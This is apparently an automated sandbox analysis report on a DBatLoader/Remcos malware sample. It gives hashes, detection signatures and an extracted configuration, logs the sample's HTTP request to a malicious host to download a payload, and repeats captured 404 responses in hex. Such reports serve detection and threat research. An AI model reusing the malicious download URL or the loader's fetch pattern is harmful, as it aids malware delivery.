Windows Analysis Report
r096teIe1H.exe

Overview

General Information

Sample Name: r096teIe1H.exe
Original Sample Name: 53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
Analysis ID: 1296092
MD5: b1e794e29881f56a4e9afa213d7c622d
SHA1: 7f5991e1e24a29eff5fad62b33e05fcff2eb0988
SHA256: 53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
Tags: exe, RemcosRAT
Infos:

Detection

DBatLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls

Classification

  • System is w10x64
  • r096teIe1H.exe (PID: 6876 cmdline: C:\Users\user\Desktop\r096teIe1H.exe MD5: B1E794E29881F56A4E9AFA213D7C622D)
  • cleanup
{"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}
Source | Rule | Description | Author | Strings
r096teIe1H.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.r096teIe1H.exe.220056c.0.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.0.r096teIe1H.exe.400000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.r096teIe1H.exe.3260000.1.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.r096teIe1H.exe.220056c.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

No Sigma rule has matched
No Snort rule has matched

            AV Detection

            Source: r096teIe1H.exe | Avira: detected
            Source: r096teIe1H.exe | Malware Configuration Extractor: DBatLoader {"Download Url": "http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk"}
            Source: r096teIe1H.exe | ReversingLabs: Detection: 57%
            Source: r096teIe1H.exe | Virustotal: Detection: 56%
            Source: http://balkancelikdovme.com/LL | Avira URL Cloud: Label: malware
            Source: http://balkancelikdovme.com/ | Avira URL Cloud: Label: malware
            Source: balkancelikdovme.com | Virustotal: Detection: 17%
            Source: http://balkancelikdovme.com/ | Virustotal: Detection: 17%
            Source: r096teIe1H.exe | Joe Sandbox ML: detected
            Source: r096teIe1H.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: C:\Users\user\Desktop\r096teIe1H.exe | Code function: 0_2_032658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032658CC

            Networking

            Source: Malware configuration extractor | URLs: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
            Source: global traffic | HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
            Source: Joe Sandbox View | ASN Name: GYRONGB GYRONGB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:38 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:15:58 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:16:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:16:18 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:16:28 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 